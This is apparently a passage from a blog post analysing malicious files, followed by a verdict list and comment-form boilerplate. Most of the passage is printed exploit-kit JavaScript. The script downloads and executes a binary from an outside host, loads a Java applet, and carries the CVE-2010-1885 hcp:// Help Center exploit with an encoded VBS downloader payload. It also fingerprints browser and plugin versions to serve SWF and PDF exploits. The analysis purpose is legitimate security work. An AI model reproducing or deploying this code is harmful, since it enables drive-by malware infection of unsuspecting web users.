var bb_tQ5Ra = CtHBMYs[‘CreateObject’](‘adodb.stream’, “”);

try {

bb_tQ5Ra[‘type’] = 1;

Fxqx_lk[‘open’](‘GET’, ‘http://alltraff.tk/test/load.php?f=1&e=4&#8217;, false); //from this url

Fxqx_lk[‘send’]();

bb_tQ5Ra[‘open’]();

bb_tQ5Ra[‘write’](Fxqx_lk[natf_w_]);

bb_tQ5Ra[‘savetofile’](y_Q2__EU, 2); //saves to the file name above.

bb_tQ5Ra[‘close’]();

}

catch (wvvEhmnS){

}

try {

q_dDn_XI[‘shellexecute’](y_Q2__EU); //and executes it.

}

catch (wvvEhmnS){

}

}

catch (wvvEhmnS){

}

}

G__Hg_F();

if (b_0_p_f(“msie 6″)){

piI__lYm();

}

document.write(”

<applet width=’100%’ height=’100%’ code=’N_kGS_.class’ archive=’5dd3034653f56299b44a547f4a

cc3b73.jar’><param name=’url’ VALUE=’http://alltraff.tk/test/load.php?f=1&e=8′></applet>&#8221;

);

if (b_0_p_f(“windows nt 5”)){

if (b_0_p_f(“msie 7”) || b_0_p_f(“msie 8″)){

var NIOq_bS = document.createElement(‘iframe’);

NIOq_bS.src = ”

Below is the hcp exploit:

HPC URL Help Center URL Validation Vulnerability CVE-2010-1885

hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=

//the payload starts from here

 

%3Cscript+defer%3Eeval%28new+ActiveXObject%28%27

wscript.shell%27%29.Run%28unescape%28%27cmd%252A%252Fc%252Ataskkill%252A%252FF%252A%252FIM

%252Ahelpctr.exe%257Ccd%252A..%252F%2526echo%252AExecute%2528strReverse%2528Replace%2528Re

place%2528U%2529htap%2528cexe.lhs%257C2%252Chtap%252Aelifotevas.oda%257C%2529ydoBesnopser.

lmx%2528etirw.oda%257Cnepo.oda%257C1%2524epyt.oda%257C3%2524edom.oda%257Cdnes.lmx%257C0%25

2CY6%2524e%25261%2524f%253Fphp.daol%252Ftset%252Fkt.ffartlla%252F%252F%253AptthY%252CYTEGY

%252Anepo.lmx%257CYexe.%257E%252F%253AcY%252A%2524%252Ahtap%257C%2529Yllehs.tpircswY%2528t

cejbOetaerC%2524lhs%252AteS%257C%2529Ymaerts.bdodaY%2528tcejbOetaerC%2524oda%252AteS%257C%

2529Yptthlmx.tfosorcimY%2528tcejbOetaerC%2524lmx%252Ates%257Ctxen%252Aemuser%252Arorre%252

AnoU%252C%252AUYU%252C%252Achr%252834%2529%2529%252C%252AU%257CU%252C%252Avbcrlf%2529%2529

%2529%252A%253E%257E.vbs%257Cwscript%252A%257E.vbs%2526del%252A%252Fq%252A%257E.vbs%27%29.

replace%28%2F%5B%2A%5D%2Fg%2CString.fromCharCode%2832%29%29.replace%28%2F%5B%24%5D%2Fg%2CS

tring.fromCharCode%2861%29%29.replace%28%2FU%2Fg%2CString.fromCharCode%2834%29%29%29%29%3B

%3C%2Fscript%3E”;

document.body.appendChild(NIOq_bS);

}

}

var F_P4j_ = hQwqbnZ();

if (F_P4j_[0] == 9 && F_P4j_[1] == 0){

if (F_P4j_[2] == 16 || F_P4j_[2] == 28 || F_P4j_[2] == 45 || F_P4j_[2] == 47 || F_P4j_[2

] == 64 || F_P4j_[2] == 115){

dRbrXL(“e8934532b803bc7483722afc9fec1176.swf”);

}

}

if (a61tq_()){

dRbrXL(“e21000adef033902673ed41e225fac49.pdf”);

}

if (b_0_p_f(“msie”) || b_0_p_f(“firefox”)){ //enumerates the webbrowsers

if (F_P4j_[0] == 9 || F_P4j_[0] == 10){

var q__zZC_h = 0;

if (F_P4j_[0] == 9 && F_P4j_[1] == 0){

if (F_P4j_[2] == 28 || F_P4j_[2] == 31 || F_P4j_[2] == 45 || F_P4j_[2] == 47 ||

F_P4j_[2] == 48 || F_P4j_[2] == 115 || F_P4j_[2] == 124 || F_P4j_[2] == 151 ||

F_P4j_[2] == 152 || F_P4j_[2] == 159){

q__zZC_h = 1;

}

}

if (F_P4j_[0] == 10 && F_P4j_[1] == 0){

if (F_P4j_[2] == 12 || F_P4j_[2] == 15 || F_P4j_[2] == 22){

q__zZC_h = 1;

}

}

if (q__zZC_h == 1){

R__fEa();

dRbrXL(“34b8f13e77984874cb6d17bc999ac790.swf”);

}

}}

RESULT:MALICIOUS

6] ta.php

 

Non-Malcious

 

 

7] id1(1)

 

Non-Mal

8] pBoot.txt

Non-Malicious:

9] id1.txt

Non-Malicious.

10] god.txt

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s